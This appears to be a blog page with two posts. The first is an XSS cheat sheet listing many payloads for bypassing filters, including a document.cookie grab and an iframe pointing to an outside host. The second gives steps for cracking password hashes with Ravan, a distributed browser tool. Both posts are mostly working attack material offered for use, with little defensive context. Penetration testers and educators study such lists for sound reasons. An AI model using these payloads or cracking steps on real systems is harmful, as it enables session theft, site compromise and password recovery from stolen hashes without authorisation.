Complete Cross site Scripting(XSS) cheat sheets : Part 1
We are producing this XSS Cheat sheet after collecting the codes from hackers' techniques and different sites especially http://ha.ckers.org/xss.html . This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters. If you have any different cheat codes , please send your code.Basic XSS codes:
----------------------------------
<script>alert("XSS")</script>
<script>alert("XSS");</script>
<script>alert('XSS')</script>
"><script>alert("XSS")</script>
<script>alert(/XSS")</script>
<script>alert(/XSS/)</script>
When inside Script tag:
---------------------------------
</script><script>alert(1)</script>
‘; alert(1);
')alert(1);//
Bypassing with toggle case:
--------------------------------------
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
XSS in Image and HTML tags:
---------------------------------------------
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
Bypass the script tag filtering:
--------------------------------------------------
<<SCRIPT>alert("XSS");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
Using String.fromCharCode function:
-----------------------------------------------------
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
You can combine the above mentioned codes and make your own cheat code.
Note:
We are extending the cheat sheet. Soon we will publish the part 2.
How to Use Ravan for Password Cracking?
In my previous article, i explained about the Ravan Tool. Now let us see how to use the Ravan for cracking passwords.
Requriments:
Lot of Friends :
Ravan
is Distributed password cracking method. So you will need lot of
friends who have Pc with Internet connection. The speed of cracking will
increase based on the number of pc contribute in the cracking.How to use Ravan?
- Go to http://www.andlabs.org/tools/ravan.html
- Enter the value of the hash that must be cracked
- Enter the value of the salt, if it is not a salted hash then leave it blank
- Enter the charset. Only these characters will be use in the brute force attack
- Select the hashing algorithm (MD5, SHA1, SHA256, SHA512)
- Select the position of the salt. (clear-text+salt or salt+clear-text)
- Hit ‘Submit Hash’
The main page manages the cracking so it must not be closed or the cracking would fail.
That is it. Once your friends click start they would be doing pieces of the work and submitting results back.
The main page would constantly monitor the progress of the cracking process and manage it across all the workers. You would be able to see the stats throughout the process, once the hash is cracked the clear-text value is displayed.
No comments:
Post a Comment